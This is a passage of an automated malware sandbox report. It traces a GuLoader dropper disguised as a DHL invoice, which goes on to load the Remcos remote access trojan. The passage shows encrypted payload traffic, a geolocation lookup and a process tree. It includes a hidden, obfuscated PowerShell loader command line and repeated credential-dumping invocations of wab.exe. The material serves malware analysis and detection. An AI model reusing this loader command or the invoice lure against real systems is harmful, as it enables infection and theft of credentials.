                                                          Data Ascii: =dnvybo&Hr&<>td!WVO&aQ9x{rRW[G^y0Uo pa8L%?=i:Qo)a'C[2y{=lQI0UyXbM&*xT^gRi0N57[S0ew0Z+WR}@YC:+_/`lsyr=Ij![E8xV+O]<G'|$077XAx,@(zvP<2?] ]zqQcIbo-P G`$1c"[[E*hzoh`~$F8LEci;Hqtz}lr,>Y.Zpc{BTI2+p-I%O>XDkds>@fQBtxyr_n;R5h$ssQ[XVg[+$:5r_OC%i$p@L@HFl/$|/dY.ytcNzJ>g_Q!F`ye3I4T`0],K+9SP5_o5T#nc"U_iPxWC\fol<oh_qi#3P.dP_hJ6f~ 8& W2|Q}c2Ka@c}"&cd[:q:[mvj~QF(g:9&xOR-R=W9&u XuSxr_I=* 7m`DUCr
                                                          Mar 28, 2024 08:01:59.688504934 CET1286INData Raw: 34 12 42 47 19 83 86 43 ad d3 4b 61 37 6b d7 63 ce 73 27 28 e0 be f6 12 30 61 37 64 86 a2 57 f6 39 5f c8 26 5d da 95 43 46 e0 8a b7 99 4d 44 87 b6 50 58 68 c8 8a 28 0b 95 11 e5 e7 ba cd 38 24 45 e6 54 b8 ca 43 2d e3 c4 d3 ac 27 81 90 ed c2 06 ee
                                                          Data Ascii: 4BGCKa7kcs'(0a7dW9_&]CFMDPXh(8$ETC-'(-',g-ojy>sn9^9%H>"4CJS<sT3It5=;\5_g@M*ewd~Z}5=V3}t&JV`[{OG#:u/G2
                                                          Mar 28, 2024 08:01:59.688546896 CET1286INData Raw: 89 4e a0 8d f5 c9 03 ea ff 6b 1d be 28 68 78 60 4b 96 69 77 f1 23 45 dd 66 86 01 d0 ea 93 93 c5 a4 af f1 93 67 c4 16 0d ce 4b 9c 00 a4 cb 73 e0 0d 04 9b c5 c9 8a 28 64 1f 84 8a ba c8 e7 0a bf 26 e9 10 66 f0 76 5d 12 3f 97 fa ae 0a 7c b3 7b 39 51
                                                          Data Ascii: Nk(hx`Kiw#EfgKs(d&fv]?|{9QpB8\-E990Hd.GhkK[M}(~!Aar9E(5,N;OiSXs~k:}3QW.6&|/+T0K`cDIB2KM(
                                                          Mar 28, 2024 08:01:59.688563108 CET1286INData Raw: 8a b5 5f 09 48 2c db d1 24 51 98 c6 da d1 af 5a 18 b6 09 b0 7e e9 7e fc bd 71 70 8b 6c d6 c7 90 a7 92 a4 6c 8c de 2f 71 9c 1b 8a c4 dc 92 77 5b 92 cd be d9 05 49 29 4d 14 a3 0b 00 34 a1 07 e3 c7 a6 c5 6b 7c 2f 5d ab 7b 5e 90 d8 49 29 10 27 6f 1c
                                                          Data Ascii: _H,$QZ~~qpll/qw[I)M4k|/]{^I)'oPYW,Hz_J^;D1=1J\ #hDcl:cV\uo[RwP#lXG|~6&5cPb>hW(2OOa+R[
                                                          Mar 28, 2024 08:01:59.688575983 CET1286INData Raw: 20 ee fc 21 06 cd 4b fb b8 91 89 c8 4f de 47 d5 b9 08 bb 49 9e 08 f1 05 2d b8 ce e1 26 47 04 72 41 02 0b f5 77 f4 46 dd d9 27 84 92 1a 36 c9 a9 00 0a f5 f6 47 53 44 ce 4a e0 e8 5e 32 d7 6a 05 69 01 47 7d c1 24 cd cd 5e d9 aa 4c f5 e6 3f 8a 8b 2d
                                                          Data Ascii: !KOGI-&GrAwF'6GSDJ^2jiG}$^L?-bfLA9(h-WR>Zr{z*]v +lx2M>2D5XbsbwdQtrw1ArJ7Wcf{d.P{+7W
                                                          Mar 28, 2024 08:01:59.688656092 CET1286INData Raw: 24 09 0c 4b e0 4d cf 42 16 7a fd 36 cb fc 26 8b 4f 5e 95 3a 39 c6 ad 7d d2 76 86 f6 b8 37 c0 34 9c 5f 36 bc 46 3c 12 59 e8 d1 5d a5 60 6e bb 4e 5d 11 5d 6c 84 12 2a 4e a6 85 9c e3 b2 bc 69 3b ab 96 9c dd e2 f9 a8 44 95 3a 10 6a 65 b4 ec 6f 4e 8c
                                                          Data Ascii: $KMBz6&O^:9}v74_6F<Y]`nN]]l*Ni;D:jeoN,&VmLo'5;nW~eewUzxn'k*F<okC-=t-U97]lSC}N~2 'J-e`NEhv[vSaF
                                                          Mar 28, 2024 08:01:59.688669920 CET1286INData Raw: e6 b3 cc cb b6 f0 ec f1 9d b4 59 d5 c0 f7 92 b7 70 a3 8e a0 42 bf a5 36 4d 6d 96 96 f5 16 65 35 b2 a1 a1 36 29 5f a4 9c 99 0a e3 f6 74 4a 35 01 cc cd b0 9c 88 0e 0a 6f f3 b4 ea ab 83 a8 9f 3c 6f 0b 03 36 ce 8c d1 32 35 ed 6d 4d d4 77 71 98 6b 3b
                                                          Data Ascii: YpB6Mme56)_tJ5o<o625mMwqk;j#%8q4MoTu8$^MB,x]IM:{+\/jDPye3DtC*%0Z)THyVAXnvk%?DU~\Wlz?36T7NZ#
                                                          Mar 28, 2024 08:01:59.688707113 CET1286INData Raw: 20 7e 7a 6c 7e 35 7f 2c 06 25 73 f9 c5 6a d5 9b be ad e3 5e dc 2f e6 fc 17 07 a5 49 76 9c d4 57 6f 1c 53 16 6e 6b e8 03 a5 ef 8b 5e 42 b6 29 64 ff de 04 36 24 32 7e ce 04 83 c0 41 b8 96 8c 1b 93 08 70 9c 7f 76 10 22 74 c2 e9 df b7 75 db bf a1 9f
                                                          Data Ascii: ~zl~5,%sj^/IvWoSnk^B)d6$2~Apv"tuW|u!0ir)2*D7H1,aug"^SdhjrUKVL0ASZ5c/%-er8%4L93 iO~S^/J2\Yx
                                                          Mar 28, 2024 08:01:59.688746929 CET1286INData Raw: 0f 70 57 df e5 d3 12 4d 42 c7 a2 87 5a 22 17 b4 ed b7 6d fa 1c e0 ec c2 f3 c2 9f c1 57 02 86 fa ed 01 9e 05 ce 3f e8 63 b6 12 42 47 49 0e cb 53 45 ba 4b 61 37 3b 5a 26 c6 23 aa 65 ec 56 97 12 30 61 67 e9 c3 5e dc 38 69 b7 b9 d7 a2 25 c5 ce 0b e8
                                                          Data Ascii: pWMBZ"mW?cBGISEKa7;Z&#eV0ag^8i%b zX([0+S'/@IzN}a#=CmX?=DDk7Y;"oWFe.K=JQiHICO{)B!AwB#aT':q18#ZA~+0LtQP6wT
                                                          Mar 28, 2024 08:01:59.688760042 CET1286INData Raw: a4 c4 4b 9e ca b9 66 3d a5 5e dc dd a7 ed 97 7c 08 93 ed 70 af 67 5a 08 99 0f 74 f0 a8 8f 67 d5 05 6f b4 96 46 e9 a3 a8 88 6a 54 4d 2f 14 de 4c c3 51 81 92 e4 a6 c5 57 6c 64 96 e0 ed 29 c6 80 d0 a7 f1 c3 ea 41 9e 45 bc de 4b 6c 43 f9 72 59 a4 12
                                                          Data Ascii: Kf=^|pgZtgoFjTM/LQWld)AEKlCrYfX(jV'NCRTlsA?y6Rq$KM?eBsgnJ@c(u"sNN`>:!:Bdi%K|CYs\8l^z#5U%Oxe
                                                          Mar 28, 2024 08:01:59.888006926 CET1286INData Raw: 63 38 7a 94 29 6e 10 72 7b 99 4b fd 96 82 81 d8 9c 70 a0 e9 8d 62 d9 c2 a0 32 de 2d 73 de f1 62 70 7d 1e 2c e0 48 31 c2 b1 74 59 4b 1b cb 89 39 2d 5c 8c 3c d9 16 85 40 70 34 59 99 63 08 82 06 2a fb 34 48 56 1e 44 b7 6d a5 0d ef 80 aa f4 66 e0 b6
                                                          Data Ascii: c8z)nr{Kpb2-sbp},H1tYK9-\<@p4Yc*4HVDmfn.P8&7b!'42F8(z0lmo|^FIx#6TES]='_=7u(npk6(QU7w d;E~B?mKA`}:


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          1192.168.2.449739178.237.33.50807824C:\Program Files (x86)\Windows Mail\wab.exe
                                                          TimestampBytes transferredDirectionData
                                                          Mar 28, 2024 08:02:02.546374083 CET71OUTGET /json.gp HTTP/1.1
                                                          Host: geoplugin.net
                                                          Cache-Control: no-cache
                                                          Mar 28, 2024 08:02:02.740959883 CET1197INHTTP/1.1 200 OK
                                                          date: Thu, 28 Mar 2024 07:02:02 GMT
                                                          server: Apache
                                                          content-length: 989
                                                          content-type: application/json; charset=utf-8
                                                          cache-control: public, max-age=300
                                                          access-control-allow-origin: *
                                                          Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 31 30 32 2e 31 36 35 2e 34 38 2e 34 33 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 32 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 57 61 73 68 69 6e 67 74 6f 6e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 44 69 73 74 72 69 63 74 20 6f 66 20 43 6f 6c 75 6d 62 69 61 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 43 6f 64 65 22 3a 22 44 43 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 44 69 73 74 72 69 63 74 20 6f 66 20 43 6f 6c 75 6d 62 69 61 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 61 72 65 61 43 6f 64 65 22 3a 22 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 6d 61 43 6f 64 65 22 3a 22 35 31 31 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 55 53 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 6f 75 6e 74 72 79 4e 61 6d 65 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 69 6e 45 55 22 3a 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 65 75 56 41 54 72 61 74 65 22 3a 66 61 6c 73 65 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 6f 6e 74 69 6e 65 6e 74 43 6f 64 65 22 3a 22 4e 41 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 6f 6e 74 69 6e 65 6e 74 4e 61 6d 65 22 3a 22 4e 6f 72 74 68 20 41 6d 65 72 69 63 61 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 6c 61 74 69 74 75 64 65 22 3a 22 33 38 2e 38 39 34 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 6c 6f 6e 67 69 74 75 64 65 22 3a 22 2d 37 37 2e 30 33 36 35 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 6c 6f 63 61 74 69 6f 6e 41 63 63 75 72 61 63 79 52 61 64 69 75 73 22 3a 22 32 30 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 5c 2f 4e 65 77 5f 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 75 72 72 65 6e 63 79 43 6f 64 65 22 3a 22 55 53 44 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 75 72 72 65 6e 63 79 53 79 6d 62 6f 6c 22 3a 22 24 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 75 72 72 65 6e 63 79 53 79 6d 62 6f 6c 5f 55 54 46 38 22 3a 22 24 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 75 72 72 65 6e 63 79 43 6f 6e 76 65 72 74 65 72 22 3a 30 0a 7d
                                                          Data Ascii: { "geoplugin_request":"102.165.48.43", "geoplugin_status":200, "geoplugin_delay":"2ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"Washington", "geoplugin_region":"District of Columbia", "geoplugin_regionCode":"DC", "geoplugin_regionName":"District of Columbia", "geoplugin_areaCode":"", "geoplugin_dmaCode":"511", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"38.894", "geoplugin_longitude":"-77.0365", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                                          Statistics

                                                          CPU Usage

                                                          Click to jump to process

                                                          Memory Usage

                                                          Click to jump to process

                                                          High Level Behavior Distribution

                                                          Click to dive into process behavior distribution

                                                          Behavior

                                                          Click to jump to process

                                                          System Behavior

                                                          General

                                                          Target ID:0
                                                          Start time:08:00:50
                                                          Start date:28/03/2024
                                                          Path:C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exe"
                                                          Imagebase:0x400000
                                                          File size:870'646 bytes
                                                          MD5 hash:9751F18FB374BF112F867381A68BB3A9
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:low
                                                          Has exited:true

                                                          General

                                                          Target ID:1
                                                          Start time:08:00:51
                                                          Start date:28/03/2024
                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"powershell.exe" -windowstyle hidden "$Panoramic=Get-Content 'C:\Users\user\AppData\Local\releve\Handelshindringens.Dec';$Voldtgtsforbryders=$Panoramic.SubString(51097,3);.$Voldtgtsforbryders($Panoramic)"
                                                          Imagebase:0xfe0000
                                                          File size:433'152 bytes
                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.2320550123.000000000B115000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:2
                                                          Start time:08:00:51
                                                          Start date:28/03/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff7699e0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:3
                                                          Start time:08:00:52
                                                          Start date:28/03/2024
                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Windows\system32\cmd.exe" /c "set /A 1^^0"
                                                          Imagebase:0x240000
                                                          File size:236'544 bytes
                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:7
                                                          Start time:08:01:47
                                                          Start date:28/03/2024
                                                          Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
                                                          Imagebase:0x460000
                                                          File size:516'608 bytes
                                                          MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000002.2866475335.0000000002FAF000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000002.2870944268.00000000089CE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000002.2870944268.00000000089B2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                          Reputation:moderate
                                                          Has exited:false

                                                          General

                                                          Target ID:8
                                                          Start time:08:02:03
                                                          Start date:28/03/2024
                                                          Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"
                                                          Imagebase:0x460000
                                                          File size:516'608 bytes
                                                          MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:moderate
                                                          Has exited:true

                                                          General

                                                          Target ID:9
                                                          Start time:08:02:03
                                                          Start date:28/03/2024
                                                          Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"
                                                          Imagebase:0x460000
                                                          File size:516'608 bytes
                                                          MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:moderate
                                                          Has exited:true

                                                          General

                                                          Target ID:10
                                                          Start time:08:02:03
                                                          Start date:28/03/2024
                                                          Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"
                                                          Imagebase:0x460000
                                                          File size:516'608 bytes
                                                          MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:moderate
                                                          Has exited:true

                                                          General

                                                          Target ID:11
                                                          Start time:08:02:03
                                                          Start date:28/03/2024
                                                          Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"
                                                          Imagebase:0x460000
                                                          File size:516'608 bytes
                                                          MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:moderate
                                                          Has exited:true

                                                          General

                                                          Target ID:12
                                                          Start time:08:02:03
                                                          Start date:28/03/2024
                                                          Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"
                                                          Imagebase:0x460000
                                                          File size:516'608 bytes
                                                          MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:moderate
                                                          Has exited:true

                                                          General

                                                          Target ID:13
                                                          Start time:08:02:03
                                                          Start date:28/03/2024
                                                          Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"
                                                          Imagebase:0x460000
                                                          File size:516'608 bytes
                                                          MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:moderate
                                                          Has exited:true

                                                          General

                                                          Target ID:14
                                                          Start time:08:02:03
                                                          Start date:28/03/2024
                                                          Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"
                                                          Imagebase:0x460000
                                                          File size:516'608 bytes
                                                          MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:moderate
                                                          Has exited:true

                                                          General

                                                          Target ID:15
                                                          Start time:08:02:03
                                                          Start date:28/03/2024
                                                          Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"
                                                          Imagebase:0x460000
                                                          File size:516'608 bytes
                                                          MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:moderate
                                                          Has exited:true

                                                          General

                                                          Target ID:16
                                                          Start time:08:02:03
                                                          Start date:28/03/2024
                                                          Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"
                                                          Imagebase:0x460000
                                                          File size:516'608 bytes
                                                          MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:moderate
                                                          Has exited:true

                                                          General

                                                          Target ID:17
                                                          Start time:08:02:03
                                                          Start date:28/03/2024
                                                          Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"
                                                          Imagebase:0x460000
                                                          File size:516'608 bytes
                                                          MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:18
                                                          Start time:08:02:03
                                                          Start date:28/03/2024
                                                          Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"
                                                          Imagebase:0x460000
                                                          File size:516'608 bytes
                                                          MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:19
                                                          Start time:08:02:03
                                                          Start date:28/03/2024
                                                          Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"
                                                          Imagebase:0x460000
                                                          File size:516'608 bytes
                                                          MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:20
                                                          Start time:08:02:03
                                                          Start date:28/03/2024
                                                          Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"
                                                          Imagebase:0x460000
                                                          File size:516'608 bytes
                                                          MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:21
                                                          Start time:08:02:03
                                                          Start date:28/03/2024
                                                          Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"
                                                          Imagebase:0x460000
                                                          File size:516'608 bytes
                                                          MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:22
                                                          Start time:08:02:03
                                                          Start date:28/03/2024
                                                          Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"
                                                          Imagebase:0x460000
                                                          File size:516'608 bytes
                                                          MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:23
                                                          Start time:08:02:03
                                                          Start date:28/03/2024
                                                          Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"
                                                          Imagebase:0x460000
                                                          File size:516'608 bytes
                                                          MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:24
                                                          Start time:08:02:03
                                                          Start date:28/03/2024
                                                          Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"
                                                          Imagebase:0x460000
                                                          File size:516'608 bytes
                                                          MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:25
                                                          Start time:08:02:03
                                                          Start date:28/03/2024
                                                          Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"
                                                          Imagebase:0x460000
                                                          File size:516'608 bytes
                                                          MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:26
                                                          Start time:08:02:03
                                                          Start date:28/03/2024
                                                          Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"
                                                          Imagebase:0x460000
                                                          File size:516'608 bytes
                                                          MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:27
                                                          Start time:08:02:03
                                                          Start date:28/03/2024
                                                          Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"
                                                          Imagebase:0x460000
                                                          File size:516'608 bytes
                                                          MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:28
                                                          Start time:08:02:03
                                                          Start date:28/03/2024
                                                          Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"
                                                          Imagebase:0x460000
                                                          File size:516'608 bytes
                                                          MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                          Has elevated privileges:true
